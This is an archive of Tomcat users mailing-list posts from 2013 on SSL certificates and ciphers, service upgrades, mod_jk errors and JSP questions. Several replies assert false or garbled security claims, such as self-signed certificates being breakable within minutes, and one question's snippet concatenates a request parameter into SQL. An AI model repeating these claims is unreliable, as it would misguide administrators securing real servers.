e-mail: users-h...@tomcat.apache.org - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org
RE: SSL Best Practices
1)Have you ever tried to coerce IE to accept a self-signed cert 2)if you purchase a pfx with a self-signed certificate sold to you by chris_is_a_hacker.com for 1.00 then who do you think can break it The cert allows browser to contact the sites SSL connector..by presenting credentials usually from a Name Server such as ADS or LDAP the real work involves breaking the algorithm implemented by the key in order to establish Key exchange on a SSLv2 transport I sincerely doubt even chris_is_a-hacker can break any of the RSA algorithms implemented by the key inside a versign.pfx 'Nuf Said Martin __ Verzicht und Vertraulichkeitanmerkung/Note de déni et de confidentialité Diese Nachricht ist vertraulich. Sollten Sie nicht der vorgesehene Empfaenger sein, so bitten wir hoeflich um eine Mitteilung. Jede unbefugte Weiterleitung oder Fertigung einer Kopie ist unzulaessig. Diese Nachricht dient lediglich dem Austausch von Informationen und entfaltet keine rechtliche Bindungswirkung. Aufgrund der leichten Manipulierbarkeit von E-Mails koennen wir keine Haftung fuer den Inhalt uebernehmen. Ce message est confidentiel et peut être privilégié. Si vous n'êtes pas le destinataire prévu, nous te demandons avec bonté que pour satisfaire informez l'expéditeur. N'importe quelle diffusion non autorisée ou la copie de ceci est interdite. Ce message sert à l'information seulement et n'aura pas n'importe quel effet légalement obligatoire. Étant donné que les email peuvent facilement être sujets à la manipulation, nous ne pouvons accepter aucune responsabilité pour le contenu fourni. From: jeffrey.har...@mantech.com To: users@tomcat.apache.org; ch...@derham.me.uk Date: Tue, 19 Mar 2013 06:04:52 -0400 Subject: RE: SSL Best Practices -Original Message- From: cjder...@gmail.com [mailto:cjder...@gmail.com] On Behalf Of chris derham Sent: Tuesday, March 19, 2013 1:58 AM To: Tomcat Users List Subject: Re: SSL Best Practices If the system is only for testing, or communicates with a limited number of systems (i.e., it is a firewalled backend system that only communicates with a front-end system), then again, a self-signed certificate would be fine. +1 I do agree that if this is a public facing system, or one in an organization with a large number of users that does not have its own CA infrastructure, then a commercial certificate would be the best choice. Commercial certificate authorities are actively targeted by hackers, and when they are broken into, the trust each os has configured of such certificates can cause issues. The recent google ssl certificate issue shows what happens when things go wrong. If users will access the site via a browser, then the browser warning will confuse them/make them used to ignoring security warnings. For applications communicating with each other, a self signed certificate will actually be more secure than a certificate authority issued certificate - assuming you trust your internal security more than you trust that of a commercial certificate authority. It all depends on what the certificate will be used for. Chris What you say is all true, but if the public is accessing the site, there is no real alternative to a commercial certificate, because there will be no way to ascertain the trust of the site at all, and as you say users will be confused by the browser warnings. Unfortunately, the security of the Internet is dependent on a relatively handful of commercial certificate authorities, several of whom have either been hacked, or who have not properly vetted requesters for certificates. Jeffrey Harris This e-mail and any attachments are intended only for the use of the addressee(s) named herein and may contain proprietary information. If you are not the intended recipient of this e-mail or believe that you received this email in error, please take immediate action to notify the sender of the apparent error by reply e-mail; permanently delete the e-mail and any attachments from your computer; and do not disseminate, distribute, use, or copy this message and any attachments. - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org
RE: Upgrading Tomcat in the customer base
Patrick if client and tc-server are on same domain..how about implementing Windows Authentication in TC? When client authenticates to the Domain all of the TC shares are restored (including TC share) http://tomcat.apache.org/tomcat-7.0-doc/windows-auth-howto.html HTHMartin __ ..place disclaimer here... From: pflah...@rampageinc.com To: users@tomcat.apache.org Subject: Upgrading Tomcat in the customer base Date: Tue, 19 Mar 2013 15:24:07 -0400 Hi, We deploy tomcat in our own folder (c:\rsi_tc\tomcat) on a WIndows machine as a service. We use the service.bat to install as a service. Historically to update tomcat we would remove the current version and install the new version. There is rub in all this which we have to change the service login to be an account that can access files from a network share. Therefore when we upgrade tomcat, we remove the current version and install the new version and then someone ( the customer :-( ) has to go into the service and change the service login back to the account that will give them access to the network share. I'm looking for a way (if possible) to avoid having the customer to have change the service login. I'm looking for suggestions to make this easier and have the following questions about whether some of my thoughts to make it easier are safe. 1. Can I *not* uninstall the service and just replace the folder structure on the file system with the new version? I have tried it and it seems to work but question whether or not it is safe. I know if a major version changes I cannot do this as the service calls tomcat6.exe vs tomcat7.exe for instance and therefore would have to do the complete uninstall/install. 2. If I do the above does calling the service.bat install again using the *newer* service.bat version make a difference? We are calling it (the newer service.bat) and it seems to be harmless and thought that it might help in case something in the batch install changed, we would get the changes. Bottom line, has anyone faced this dilemma and found a successful way to upgrade a tomcat instance that uses a unique service login. Thanks for any input. Pat - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org
RE: SSL Best Practices
Jeff do you have keystore and certificate..if not go to verisign and get a CATrusted pfx... the cost is worth it and anything you create with a self-signed cert will be broken in less than 5 min Feel free to Pingback if you have any questions. Martin From: jeffrey.jan...@polydyne.com To: users@tomcat.apache.org Subject: RE: SSL Best Practices Date: Mon, 18 Mar 2013 13:34:44 + -Original Message- From: Jeffrey D. Fisher [mailto:jeff.fisher12...@cox.net] Sent: Friday, March 15, 2013 3:03 PM To: users@tomcat.apache.org Subject: SSL Best Practices Gentlemen (Ladies): I am looking for a published best practice on editing the SERVER.XML configuration file to use SSL/HTTPS. The key are imported into the keystore. Any input is appreciated. Jeff Fisher Omaha, NE I would start by reading the Tomcat Documentation on the subject. It's pretty straightforward. Jeff - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org
RE: Getting HttpSession from HandshakeRequest/Configurator
Nick if you dont mind Comet's implementation of WebSocket events to Servlet-3.0 POST and GET then checkout http://java.dzone.com/articles/tomcat-websockets-html5 I'll let you test drive to see if Ant 's WebSocketServlet fully supports all aspects of the WebSocket spechttp://en.wikipedia.org/wiki/WebSocket Keep us apprised, Happy Driving Martin __ Place Long-winded disclaimer here From: nicho...@nicholaswilliams.net Subject: Getting HttpSession from HandshakeRequest/Configurator Date: Sun, 17 Mar 2013 17:56:23 -0500 To: users@tomcat.apache.org Based on my reading of the WebSocket spec mailing lists and API documentation, if I want to get the HttpSession that exists when a WebSocket connection is negotiated I need to extend ServerEndpointConfig.Configurator, override #modifyHandshake(), and call #getHttpSession() on the HandshakeRequest. However, I need a little clarification, because I'm not seeing how this is going to work: 1) Tomcat doesn't implement HandshakeRequest ... anywhere. So I'm not even seeing how that method could ever be called with a non-null argument. (Admittedly, I haven't run this yet ... I'm sending this preemptively while I complete my code, to go ahead and get some feedback). 2) None of the arguments to #modifyHandshake() provide access to the Session. So how am I supposed to do anything with it? How can I associate the HttpSession with the Session? - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org
RE: Running a binary program from a JSP
Hi Dan Earlier I gave him an example of a DWR backend bean which handles the mechanics of Runtime.getRuntime().exec(cmd.,exe /C 'fubar'); I *was* going to suggest using An Applet but I didnt want to spend the rest of the month twiddling the exact permutation of execute and read permissions Thanks for the link! Martin Gainty __ Verzicht und Vertraulichkeitanmerkung/Note de déni et de confidentialité Diese Nachricht ist vertraulich. Sollten Sie nicht der vorgesehene Empfaenger sein, so bitten wir hoeflich um eine Mitteilung. Jede unbefugte Weiterleitung oder Fertigung einer Kopie ist unzulaessig. Diese Nachricht dient lediglich dem Austausch von Informationen und entfaltet keine rechtliche Bindungswirkung. Aufgrund der leichten Manipulierbarkeit von E-Mails koennen wir keine Haftung fuer den Inhalt uebernehmen. Ce message est confidentiel et peut être privilégié. Si vous n'êtes pas le destinataire prévu, nous te demandons avec bonté que pour satisfaire informez l'expéditeur. N'importe quelle diffusion non autorisée ou la copie de ceci est interdite. Ce message sert à l'information seulement et n'aura pas n'importe quel effet légalement obligatoire. Étant donné que les email peuvent facilement être sujets à la manipulation, nous ne pouvons accepter aucune responsabilité pour le contenu fourni. Subject: Re: Running a binary program from a JSP From: dmik...@vmware.com Date: Thu, 14 Mar 2013 08:06:06 -0400 To: users@tomcat.apache.org On Mar 14, 2013, at 12:34 AM, Tim Gross wrote: Hi, I want to know if it is possible to execute a binary program (written in C) from within a JSP. Yes. I would like to do this on the server side, not the browser, in Tomcat6. If it is possible, can somebody provide an example. Use... http://docs.oracle.com/javase/6/docs/api/java/lang/Runtime.html or http://docs.oracle.com/javase/6/docs/api/java/lang/ProcessBuilder.html Google can give you examples. Dan Sorry if I am using the wrong mailing list. Feel free to redirect me if that is the case. Thanks, Tim. - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org
RE: Compiling JSPs at runtime
Zimmer http://www.jarfinder.com/index.php/jars/versionInfo/4589 Viel Gluck Martin __ Verzicht und Vertraulichkeitanmerkung Diese Nachricht ist vertraulich. Sollten Sie nicht der vorgesehene Empfaenger sein, so bitten wir hoeflich um eine Mitteilung. Jede unbefugte Weiterleitung oder Fertigung einer Kopie ist unzulaessig. Diese Nachricht dient lediglich dem Austausch von Informationen und entfaltet keine rechtliche Bindungswirkung. Aufgrund der leichten Manipulierbarkeit von E-Mails koennen wir keine Haftung fuer den Inhalt uebernehmen. Date: Sat, 9 Mar 2013 14:39:23 +0100 Subject: Compiling JSPs at runtime From: fb666fb...@gmail.com To: users@tomcat.apache.org Hello! I'm working on a WCMS system where I want to compile some view components at runtime. I found the Jasper howto to compile using Ant, but that's not what I need. I have dynamic JSP code stored in a database. Simplified I want to do something like this: protected void doRequest(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { int templateId = request.getParameter(templateId); String jspCode = db.queryString(select jspCode from templates where id = + templateId); Jasper jcpc = new Jasper(); Servlet jspServlet = jspc.compile(jspCode) forward(jspServlet); } For sure this is very simplified. I know that the Jasper JSPC will need much more configuration/environment set. Can someone point me to the right classes to start? Thanks, Gerd
RE: Tomcat does not accept connections from Safari on iPad vs an SSL connector with JSSE ciphers
someone put cipherSuites patch on TC 7 Connector.. *IF you are implementing TC7 Connector with cipherSuites attribute support and have not specified cipherSuites supported by your ppk keys* then yes its tomcats fault Otherwise its not.. Ciao, Martin Gainty __ Verzicht und Vertraulichkeitanmerkung Diese Nachricht ist vertraulich. Sollten Sie nicht der vorgesehene Empfaenger sein, so bitten wir hoeflich um eine Mitteilung. Jede unbefugte Weiterleitung oder Fertigung einer Kopie ist unzulaessig. Diese Nachricht dient lediglich dem Austausch von Informationen und entfaltet keine rechtliche Bindungswirkung. Aufgrund der leichten Manipulierbarkeit von E-Mails koennen wir keine Haftung fuer den Inhalt uebernehmen. Date: Fri, 15 Feb 2013 12:36:53 -0500 From: ch...@christopherschultz.net To: users@tomcat.apache.org Subject: Re: Tomcat does not accept connections from Safari on iPad vs an SSL connector with JSSE ciphers -BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Giuseppe, On 2/15/13 9:07 AM, Giuseppe Sacco wrote: Debugging the SSL handshake, I found that the problem is really about ciphers because the handshake fails with exception javax.net.ssl.SSLHandshakeException: no cipher suites in common So, this is really something to be investigated in JSSE instead of tomcat. I am sorry for noise in this list :-( We were pretty sure it wasn't Tomcat's fault, but we can still probably help. Allow legacy hello messages: true [snip] http-192.168.1.55-8443-1, READ: SSLv3 Handshake, length = 75 *** ClientHello, SSLv3 RandomCookie: GMT: 1360933724 bytes = { 203, 86, 168, 88, 75, 77, 52, 134, 4, 76, 204, 78, 0, 160, 168, 123, 96, 78, 106, 23, 40, 47, 219, 81, 28, 23, 174, 156 } Session ID: {} Cipher Suites: [TLS_EMPTY_RENEGOTIATION_INFO_SCSV, Unknown 0x0:0x3d, Unknown 0x0:0x3c, TLS_RSA_WITH_AES_128_CBC_SHA, SSL_RSA_WITH_RC4_128_SHA, SSL_RSA_WITH_RC4_128_MD5, TLS_RSA_WITH_AES_256_CBC_SHA, SSL_RSA_WITH_3DES_EDE_CBC_SHA, Unknown 0x0:0x67, Unknown 0x0:0x6b, TLS_DHE_RSA_WITH_AES_128_CBC_SHA, TLS_DHE_RSA_WITH_AES_256_CBC_SHA, SSL_DHE_RSA_WITH_3DES_EDE_CBC_SHA, Unknown 0x0:0x3b, SSL_RSA_WITH_NULL_SHA, SSL_RSA_WITH_NULL_MD5] Compression Methods: { 0 } *** So the client is doing an SSLv3 handshake. The message above about allowing legacy hellos seems like it should support a SSLv3 handshake. Looking at the ciphers, your JVM (without BouncyCastle) and client truly have no overlap. I'm actually surprised that your JVM does not support any TLS_RSA_* or TLS_DHE_* ciphers. Can you re-run my cipher-dump program without BouncyCastle and provide the full output? I was a little unclear as to what you posted last time. - -chris -BEGIN PGP SIGNATURE- Version: GnuPG/MacGPG2 v2.0.17 (Darwin) Comment: GPGTools - http://gpgtools.org Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/ iEYEAREIAAYFAlEecjUACgkQ9CaO5/Lv0PCEnwCdE7P2NRug8jYW+GcdcT2kUB7u ZGwAoKNBfMMPOQCAm2IATvldiWpaAVrO =qMlU -END PGP SIGNATURE- - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org
RE: mod_jk errors errno=110 and errno=115
Phillipe ajp_send_request::jk_ajp_common.c (1630): (nodeYY) connecting to backend failed. Tomcat is probably not started or is listening on the wrong port (errno=115) indicate that you might have a misconfig on jk.properties ...check out host and port attributes here http://tomcat.apache.org/connectors-doc/reference/workers.html Bon Chance, Martin __ Note de déni et de confidentialitéCe message est confidentiel et peut être privilégié. Si vous n'êtes pas le destinataire prévu, nous te demandons avec bonté que pour satisfaire informez l'expéditeur. N'importe quelle diffusion non autorisée ou la copie de ceci est interdite. Ce message sert à l'information seulement et n'aura pas n'importe quel effet légalement obligatoire. Étant donné que les email peuvent facilement être sujets à la manipulation, nous ne pouvons accepter aucune responsabilité pour le contenu fourni. Date: Thu, 14 Feb 2013 14:17:10 +0100 Subject: mod_jk errors errno=110 and errno=115 From: pbo...@gmail.com To: users@tomcat.apache.org Hello, We have a mod_jk in version 1.2.28 with Apache 2.16 fronting a Tomcat server in version 6 on JDK6. We are facing long response times and timeouts from time to time. Mod_jk log files show the following errors: [][X] [error] ajp_connect_to_endpoint::jk_ajp_common.c (1035): (nodeXX) cping/cpong after connecting to the backend server failed (errno=110) [][X] [error] ajp_send_request::jk_ajp_common.c (1630): (nodeXX) connecting to backend failed. Tomcat is probably not started or is listening on the wrong port (errno=110) [][X] [error] ajp_connect_to_endpoint::jk_ajp_common.c (1035): (nodeXX) cping/cpong after connecting to the backend server failed (errno=110) [][X] [error] ajp_send_request::jk_ajp_common.c (1630): (nodeXX) connecting to backend failed. Tomcat is probably not started or is listening on the wrong port (errno=110) [][X] [error] ajp_service::jk_ajp_common.c (2626): (nodeXX) connecting to tomcat failed. [][X] [error] ajp_send_request::jk_ajp_common.c (1630): (nodeYY) connecting to backend failed. Tomcat is probably not started or is listening on the wrong port (errno=115) [][X] ] [error] ajp_send_request::jk_ajp_common.c (1630): (nodeYY) connecting to backend failed. Tomcat is probably not started or is listening on the wrong port (errno=115) [][X] [error] ajp_service::jk_ajp_common.c (2626): (nodeYY) connecting to tomcat failed. What could be the explanations except for Tomcat Thread pool not having threads available anymore ? Thing we checked. Was there fixes in new mod_jk versions (1.2.37) regarding issues like these ? Thanks for your help
RE: Problem
eclipse is an enormous resource hog..Ive seen eclipse crash when someone opens vi after eclipse is running so the problem is not tomcat but your Tomcat (sysdeo? plugin) which version Tomcat(sysdeo?) plugin are you running? Martin __ Verzicht und Vertraulichkeitanmerkung Diese Nachricht ist vertraulich. Sollten Sie nicht der vorgesehene Empfaenger sein, so bitten wir hoeflich um eine Mitteilung. Jede unbefugte Weiterleitung oder Fertigung einer Kopie ist unzulaessig. Diese Nachricht dient lediglich dem Austausch von Informationen und entfaltet keine rechtliche Bindungswirkung. Aufgrund der leichten Manipulierbarkeit von E-Mails koennen wir keine Haftung fuer den Inhalt uebernehmen. From: vinit1...@live.in To: users@tomcat.apache.org Subject: RE: Problem Date: Mon, 21 Jan 2013 10:50:36 +0530 I have run the TC in standlone mode...and it is running .. but when running thru eclipse juno ...it is showing the message - Server Tomcat v7.0 Server at localhost was unable to start within 45 seconds. If the server requires more time, try increasing the timeout in the server editor. i have reinstalled the plugin and increase the start timeout...its makes no change. thanks From: mgai...@hotmail.com To: users@tomcat.apache.org Subject: RE: Problem Date: Sat, 19 Jan 2013 08:40:09 -0500 what does the TC log say.. have you run TC standalone $CATALINA_HOME\bin\catalina start if TC runs standalone but not thru eclipse then you have 2 possible problems: 1)possible Mis-configured TC eclipse plugin 2)There is a problem with TC eclipse plugin itself..probably 2a)possible version mismatch between TC plugin and child dependencies 2b)possible resource allocation issue..socket bound..not enough PermGen space etc pingback with your findings Martin__ Verzicht und Vertraulichkeitanmerkung Diese Nachricht ist vertraulich. Sollten Sie nicht der vorgesehene Empfaenger sein, so bitten wir hoeflich um eine Mitteilung. Jede unbefugte Weiterleitung oder Fertigung einer Kopie ist unzulaessig. Diese Nachricht dient lediglich dem Austausch von Informationen und entfaltet keine rechtliche Bindungswirkung. Aufgrund der leichten Manipulierbarkeit von E-Mails koennen wir keine Haftung fuer den Inhalt uebernehmen. From: vinit1...@live.in To: users@tomcat.apache.org Subject: Problem Date: Sat, 19 Jan 2013 13:22:17 +0530 Hi all,I am having a problem in starting the apache tomcat server version 7.0.31 through eclipse.It is showing the message that server taking time to start the server,so increase the start time limit,after configuring this i am not able to rectify this problem. thanks
RE: session not working when dash or underscore in application name
There are a number of TC variables that are acquired from the FileSystem during webapp initialiasation.. unfortunately when File systems assign folder name they vary widely in their treatment of 'special characters' in filenames as a test ..install Tomcat to Tomcat off of root folder then place webapps off of Tomcat then install one webapp heads-or-tails so in your mind your filesystem *should* look like /Tomcat/webapps/heads-or-tails But NTFS File System creates an 8 character filename that it assigns as directory folder so instead of heads-or-tails folder you'll get /Tomcat/webapps/HEADS-~1 Not inserting spaces, dashes (or anything besides a-z,0-9,A-Z) into folder-name is always a safe deployment strategy Bon Chance, Martin Gainty __ Note de déni et de confidentialitéCe message est confidentiel et peut être privilégié. Si vous n'êtes pas le destinataire prévu, nous te demandons avec bonté que pour satisfaire informez l'expéditeur. N'importe quelle diffusion non autorisée ou la copie de ceci est interdite. Ce message sert à l'information seulement et n'aura pas n'importe quel effet légalement obligatoire. Étant donné que les email peuvent facilement être sujets à la manipulation, nous ne pouvons accepter aucune responsabilité pour le contenu fourni. Date: Sun, 20 Jan 2013 10:51:10 +0100 From: benintechnolog...@yahoo.fr To: users@tomcat.apache.org Subject: Re: session not working when dash or underscore in application name Thanks, maybe the problem has been solved in 7.0.34, I'll try that version later in the meantime I simply removed all dashes and underscores, and everything works fine Le 19/01/2013 20:52, Christopher Schultz a écrit : -BEGIN PGP SIGNED MESSAGE- Hash: SHA256 To whom it may concern, On 1/19/13 7:15 AM, Benin Technologies wrote: I just installed Tomcat 7.0.32 on Debian Linux 6 (Squeeze). Client is Mozilla Firefox 12.0, also on Debian Linux 6. To test session behavior, I did a simple JSP page that simulates a coin launch (heads or tales), and displays the total of heads and total of tails. If my war file is called headsOrTails.war, it works just fine : http://tomcat:8080/headsOrTails/ but if there are dashes or underscores in the name, Tomcat creates a new session for each page request (so I can't get the totals) http://tomcat:8080/heads-or-tails/ http://tomcat:8080/heads_or_tails/ is this a normal behavior ? I do not experience the behavior you describe on 7.0.34. Neither dashes nor underscores anywhere in the path of the JSP seem to have that effect: a single session is created when I try it. Perhaps something else is affecting your environment? - -chris -BEGIN PGP SIGNATURE- Version: GnuPG/MacGPG2 v2.0.17 (Darwin) Comment: GPGTools - http://gpgtools.org Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/ iEYEAREIAAYFAlD6+X0ACgkQ9CaO5/Lv0PDYxACeIdD6MLMC1P8Fwpzk6BFCHjnR ZiIAoJRe1RfgHH9ZWbe9T6lDMn3A+PbO =n4ZY -END PGP SIGNATURE- - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org
RE: Problem
what does the TC log say.. have you run TC standalone $CATALINA_HOME\bin\catalina start if TC runs standalone but not thru eclipse then you have 2 possible problems: 1)possible Mis-configured TC eclipse plugin 2)There is a problem with TC eclipse plugin itself..probably 2a)possible version mismatch between TC plugin and child dependencies 2b)possible resource allocation issue..socket bound..not enough PermGen space etc pingback with your findings Martin__ Verzicht und Vertraulichkeitanmerkung Diese Nachricht ist vertraulich. Sollten Sie nicht der vorgesehene Empfaenger sein, so bitten wir hoeflich um eine Mitteilung. Jede unbefugte Weiterleitung oder Fertigung einer Kopie ist unzulaessig. Diese Nachricht dient lediglich dem Austausch von Informationen und entfaltet keine rechtliche Bindungswirkung. Aufgrund der leichten Manipulierbarkeit von E-Mails koennen wir keine Haftung fuer den Inhalt uebernehmen. From: vinit1...@live.in To: users@tomcat.apache.org Subject: Problem Date: Sat, 19 Jan 2013 13:22:17 +0530 Hi all,I am having a problem in starting the apache tomcat server version 7.0.31 through eclipse.It is showing the message that server taking time to start the server,so increase the start time limit,after configuring this i am not able to rectify this problem. thanks
RE: Restricting ciphers
1. The ciphers parameter in Connecter determines the enabled cipher suites in the SSLSocket. See SSLSocket.setEnabledCipherSuites(). That in turn restricts which actual cipher suite can be negotiated with the client, depending also on the client's cipher suites and how JSSE chooses among those that intersect. MGunderstood 2. The private key itself doesn't have any 'supported ciphers' so your question is already meaningless. However (a) it does have a *type*, which is generally RSA or else DH, and (b) it corresponds to a single X.509 certificate which contains a public key in the same type or format. MGyes the public key would implement RSA or DH or Idea or some other *type* If the server requests a client certificate, it (i.e. JSSE, not Tomcat) sends an SSL CertificateRequest message, which contains a list of acceptable certificate types and a list of acceptable signers. MGthus the choice for cipher suites is now assigned MGreprising the publicKey signer algorithm to cipher suite MGWith a RSA (public)key you can nominally use the RSA and DHE_RSA cipher suite. But if the server certificate has a Key Usage extension which does not include the keyEncipherment flag, then you are nominally limited to DHE_RSA. MGWith a DSA (public) key you can use only a DHE_DSS cipher suite. MGWith a Diffie-Hellman (public) key, you can use only one of DH_RSA or DH_DSS, depending on the issuing certificate authority key type. If the client certificate isn't one of those types or isn't signed by one of those signers it isn't sent MGthe choice is made! and if the Web resource being requested is defined as requiring SSL client authentication, Tomcat would then deny access. MGlets look at the guts of a public key to clarify whats going on MGkeytool -list -v -keystore NotForOutsideUse.jks Keystore type: JKS Keystore provider: SUN Your keystore contains 1 entry Alias name: Alias Creation date: Apr 24, 2012 Entry type: PrivateKeyEntry Certificate chain length: 1 Certificate[1]: Owner: UID=99, EMAILADDRESS=paynom...@paynomind.com, CN=BigBank, OU=, O=BigBank.com Issuer: UID=IssuingAuthority, CN=CanonicalName, OU=IT Security, O=CanonicalName Serial number: Valid from: Tue Apr 24 12:21:00 EDT 2012 until: Fri Apr 24 12:21:00 EDT 2015 Certificate fingerprints: MD5: SHA1: Signature algorithm name: SHA1withRSA Version: 3 /snip lets look at the log produced by TC when Public key =NotForOutsideUse.jks request is made in the JSSE Key Exchange keyStore is : NotForOutsideUse.jks keyStore type is : jks init keymanager of type SunX509 found key for : {Omitted} chain [0] = [ [ Version: V3 Subject: UID=99, CN=CanonicalName ID: 99, OU=, O=paynomind.com Signature Algorithm: SHA1withRSA Key: Sun RSA public key, 2048 bits modulus: Omitted public exponent: 9 Validity: [From: Fri Dec 10 11:29:21 EST 2010, To: Mon Dec 09 11:29:21 EST 2013] Issuer: UID=PayNoMind, CN=CanonicalName, OU=Dept1, O=PayNoMind SerialNumber: [ Omitted ] EXAMPLE CONCLUSION: the JSSE Key exchange is implementing SSLV3 Protocol AND RSA Signing Algo from the eligible ciphers listed here http://www.openssl.org/docs/apps/ciphers.html could the server implement IDEA-CBC-SHA cipher (if listed in Tomcat Connector ciphers=IDEA-CBC-SHA ... My understanding is there can be NO handshake as there is a mismatch BETWEENSigning Algo already in use (RSA) with the Signing Algorithm identified by the cipher (IDEA) from the ciphers parameter is this not the case? Connection between (1) and (2): zero. MGagreed EJP -Original Message- From: Martin Gainty [mailto:mgai...@hotmail.com] Sent: Friday, 11 January 2013 2:35 PM To: Tomcat Users List Subject: RE: Restricting ciphers its a simple question what does ciphers parameter in Connector have anything to do with the supported ciphers from the key itself the 2 are disconnected please dont waste my time and anyone elses with insults when you are unable to answer this simple question Martin Gainty ___ When Free Speech and Discovery are replaced by Confusion and Obfuscation its time to move Date: Thu, 10 Jan 2013 18:25:02 -0500 From: ch...@christopherschultz.net To: users@tomcat.apache.org Subject: Re: Restricting ciphers -BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Martin, Honestly, I'm not sure why I'm feeding the troll at this point. Maybe I'm trying to atone for some horrible crime I can't remember. On 1/10/13 10:05 AM, Martin Gainty wrote: terminology : Nobody was arguing about terminology. Next time, just refer to Wikipedia like everyone else. All you don't know is whether those certificate private key are RSA or DSA algorithms It doesn't matter: you can use RSA (like everyone does) or DSA and that will only determine the type
RE: Restricting ciphers
terminology : the X509 standard defines certificates, and RSA and DSA are two of the public key algorithms that can be used in those certificates; certificates are used to hold public keys, and never private keys. PKCS#12 is a standard for a container which holds an X509 client certificates and private keys So, if you're examining a PKCS#12 file (typically .p12 extension or a .pfx extension), then you already know: It contains at least one X509 client certificate and corresponding private keys. All you don't know is whether those certificate private key are RSA or DSA algorithms You can check this by extracting the certificate(s), and then examine them:openssl pkcs12 -in mycert.p12 -clcerts -nokeys -out mycert.crt openssl x509 -in mycert.crt -text The text output of the openssl x509 command should include a Subject Public Key section, which will include fields that let you see if it's an RSA or DSA key (along with the key size). http://stackoverflow.com/questions/1722181/determine-certificate-type PublicKey Generation: to generate a public-key from PKCS12 privateKeyAndX509Cert use openssl openssl pkcs12 -in myFile.p12 -out myPublicKey.pem -clcerts -nokeys https://ca.cern.ch/ca/Help/?kbid=023010 KeyAlgorithms: KeyAlgorithms are categorised to their cipher-groups symmetric ciphers, public-key ciphers, and one-way hashing to list available ciphers within AES algorithm use openssl e.g. openssl ciphers -v 'AES+HIGH' cipherGroup is categorised by keysize within cipher-groups (usually a 4digit number which is a power of 2 e.g. 1024 and 2048) http://www.gnupg.org/gph/en/manual.html#AEN185 each permutation of cipherGroup-KeySize is further categorised according to implemented ModeOfOperation http://en.wikipedia.org/wiki/Block_cipher_modes_of_operation ECB, CBC and PCBC are the usual choices for the optional ModeOfOperation parameter Determining the ALGO-CIPHER supported by your key so we can see that public keys contain a algorithm-cipher combination but how to determine the algo-cipher supported by your key: keytool -list -v -keystore fubar.pfx -storetype PKCS12 Here is output: Certificate fingerprints: MD5: SHA1: Signature algorithm name: SHA1withRSA Providers (SUN, SunJCE, SunJSSE,SunRsaSign, IBMJSSE, bcprov-jdkNN-MMM) Lets stick with SunJSSE as our provider supported ciphers will be those ciphers which match SHA1 with RSA from this list: http://docs.oracle.com/javase/1.5.0/docs/guide/security/jsse/JSSERefGuide.html so what you are asking Tomcat Connector to do is 1)export contents of supplied keystoreFile key of keystoreType PKCS12 2)determine Signature algorithm name 3)aggregate cipherSuite by determining Signature specific supported ciphers from Signature algorithm name from http://docs.oracle.com/javase/1.5.0/docs/guide/security/jsse/JSSERefGuide.html 4)reference ciphers attribute from Tomcat Connector 5)determine SignatureSpecificSupportedCiphers from 3) and implement ONLY those ciphers which match exactly to the ciphers listed in Tomcat Connector 5) (i have not seen this currently implemented) Martin __ do not alter or disrupt this transmission Date: Thu, 10 Jan 2013 11:44:49 +0400 Subject: Re: Restricting ciphers From: knst.koli...@gmail.com To: users@tomcat.apache.org 2013/1/10 Baron Fujimoto ba...@hawaii.edu: On Wed, Jan 09, 2013 at 01:08:01PM +0400, Konstantin Kolinko wrote: 2013/1/9 Baron Fujimoto ba...@hawaii.edu: I'm attempting to mitigate BEAST (CVE-2011-3389) attacks on Tomcat 6.0.35. My understanding is that the attack applies only to CBC ciphers, and that RC4 ciphers are not vulnerable, so I am attempting to restrict the set of ciphers that Tomcat uses with the following config for a connector: Connector protocol=HTTP/1.1 SSLEnabled=true address=0.0.0.0 port=8443 maxThreads=150 scheme=https secure=true keystoreFile=/path/to/keystore keystoreType=pkcs12 ciphers=TLS_RSA_WITH_RC4_128_SHA, TLS_RSA_WITH_RC4_128_MD5, SSL_CK_RC4_128_WITH_MD5 clientAuth=false sslProtocol=TLS / (...) As can be seen from your usage of keystoreType attribute, you are using Java implementation of the Connector, not openssl/APR one. You should look into Java documentation for their cipher names. See this thread from October 2009: http://markmail.org/message/zn4namfhypyxum23 Ahh, that was it! It did not occur to me that OpenSSL and Java might name the ciphers differently. If I restrict the ciphers to those from the (differently named) set used by Java, it works as expected. Mahalo! ciphers=SSL_RSA_WITH_RC4_128_MD5, SSL_RSA_WITH_RC4_128_SHA, TLS_ECDHE_ECDSA_WITH_RC4_128_SHA, TLS_ECDHE_RSA_WITH_RC4_128_SHA, TLS_ECDH_ECDSA_WITH_RC4_128_SHA,